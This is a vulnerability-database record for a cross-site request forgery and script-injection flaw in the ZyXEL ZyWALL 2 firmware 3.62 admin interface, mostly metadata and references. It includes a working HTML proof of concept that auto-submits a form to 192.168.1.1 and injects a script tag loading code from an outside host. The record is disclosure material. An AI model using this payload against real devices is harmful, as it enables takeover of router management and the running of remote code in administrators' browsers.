ID

VAR-E-200708-0103


CVE

cve_id:CVE-2007-4318

Trust: 1.6

cve_id:CVE-2007-4317

Trust: 0.3

cve_id:CVE-2007-4319

Trust: 0.3

sources: BID: 25262 // EXPLOIT-DB: 30485 // EDBNET: 52129

EDB ID

30485


TITLE

ZYXEL ZyWALL 2 3.62 - '/Forms/General_1?sysSystemName' Cross-Site Scripting - Hardware remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 30485

DESCRIPTION

ZYXEL ZyWALL 2 3.62 - '/Forms/General_1?sysSystemName' Cross-Site Scripting. CVE-2007-4318CVE-38721 . remote exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 30485

AFFECTED PRODUCTS

vendor:zyxelmodel:zywallscope:eqversion:23.62

Trust: 1.3

sources: BID: 25262 // EXPLOIT-DB: 30485

EXPLOIT

source: https://www.securityfocus.com/bid/25262/info

ZyXEL ZyWALL 2 is prone to multiple remote vulnerabilities that affect the management interface.

An attacker can exploit these issues to carry out cross-site request forgery, HTML-injection, and denial-of-service attacks.

ZyWALL 2 running with firmware V3.62(WK.6) is reported vulnerable to this issue.

<html>
<body onload="document.CSRF.submit()">
<FORM name="CSRF" METHOD="POST"
ACTION="http://192.168.1.1/Forms/General_1">
<INPUT NAME="sysSystemName" VALUE="<script src='http://nx.fi/X'>"
<INPUT NAME="sysDomainName" VALUE="evil.com">
<INPUT NAME="StdioTimout" VALUE="0">
<INPUT NAME="sysSubmit" VALUE="Apply">
</form>
</body>
</html>

Trust: 1.0

sources: EXPLOIT-DB: 30485

EXPLOIT LANGUAGE

html

Trust: 0.6

sources: EXPLOIT-DB: 30485

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 30485

TYPE

'/Forms/General_1?sysSystemName' Cross-Site Scripting

Trust: 1.0

sources: EXPLOIT-DB: 30485

CREDITS

Henri Lindberg

Trust: 0.6

sources: EXPLOIT-DB: 30485

EXTERNAL IDS

db:EXPLOIT-DBid:30485

Trust: 1.9

db:BIDid:25262

Trust: 1.9

db:NVDid:CVE-2007-4318

Trust: 1.6

db:EDBNETid:52129

Trust: 0.6

db:NVDid:CVE-2007-4317

Trust: 0.3

db:NVDid:CVE-2007-4319

Trust: 0.3

sources: BID: 25262 // EXPLOIT-DB: 30485 // EDBNET: 52129

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2007-4318

Trust: 1.6

url:https://www.securityfocus.com/bid/25262/info

Trust: 1.0

url:https://www.exploit-db.com/exploits/30485/

Trust: 0.6

url:http://www.louhi.fi/advisory/zyxel_070810.txt

Trust: 0.3

url:https://www.exploit-db.com/exploits/30485

Trust: 0.3

url:http://us.zyxel.com/products/model.php?indexcate=1044940679&indexcate1=1123007871&indexflagvalue=1021873683

Trust: 0.3

sources: BID: 25262 // EXPLOIT-DB: 30485 // EDBNET: 52129

SOURCES

db:BIDid:25262
db:EXPLOIT-DBid:30485
db:EDBNETid:52129

LAST UPDATE DATE

2022-07-27T09:26:00.693000+00:00


SOURCES UPDATE DATE

db:BIDid:25262date:2016-07-05T22:00:00

SOURCES RELEASE DATE

db:BIDid:25262date:2007-08-10T00:00:00
db:EXPLOIT-DBid:30485date:2007-08-10T00:00:00
db:EDBNETid:52129date:2007-08-10T00:00:00